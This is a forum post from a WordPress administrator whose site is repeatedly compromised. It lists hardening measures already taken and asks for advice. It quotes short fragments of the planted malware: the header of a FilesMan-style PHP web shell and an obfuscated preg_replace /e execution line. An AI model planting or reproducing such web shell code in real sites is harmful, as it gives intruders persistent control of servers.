I'm at a complete loss at this point.
Hackers haven been compromising our WP3.1.2 install for the last 5 days around the clock and managed to introduce both "<iframe..>" content in my secure wp-config.php as well as Malware PHP files across several folders.
I tightened security all over the place, but they still are able to introduce new PHP files across the filesystem regardless off file & folder permissions:
Some of those Malware files incude content such as:
<?php $auth_pass = "5bd3898279e9024046c38271e135db80"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true;
<?php preg_replace("/aoRJfwFgvd1uhhs45xuh1R3y/e", "uOwQScq6H84YA5GeyGYHg04WJ8Pc
and other stuff. They even modified folder permissions and (!) .htaccess (perm: 440!).
I thought our system (new install, WordPress 3.1.2) was pretty secure to begin with, here is what else we did:
* _all_ folders _except_ the Super Cache folder are non writable, mostly 550
* all of the typical .htaccess (and more) relevant settings are in place, perm = 400
* no POST without proper site REFERRER
* capturing other REQUEST TYPES, eg HEAD, TRACE...
* filtering QUERY_STRINGS
* wp-config, wp-admin, login are protected (apache login/pw)
* plus... roughly 60 lines dedicated to filter hack/spam attempts
* Secured WP via plugins (no version generator / capturing malicious requests)
* PHP.ini settings
* safe mode on, register_globals off, allow_url_fopen off etc.
* Server Quota in place
* wp-config.php has been replaced with a "dummy" pointing to a secure place
-> created a new secure folder (500) including a pseudo wp-config.php (400)
* new,secure wp-config, configured with
* define('WP_DEBUG', false);
* NEW $table_prefix
* Changed all passwords (DB, FTP, WP Logins)
* Ran a virus and Malware check on our local computers: they're clean
We're at a loss, any idea what else to look out for? Every other hour we start cleaning infected files afresh...
Thanks for anything you can think of....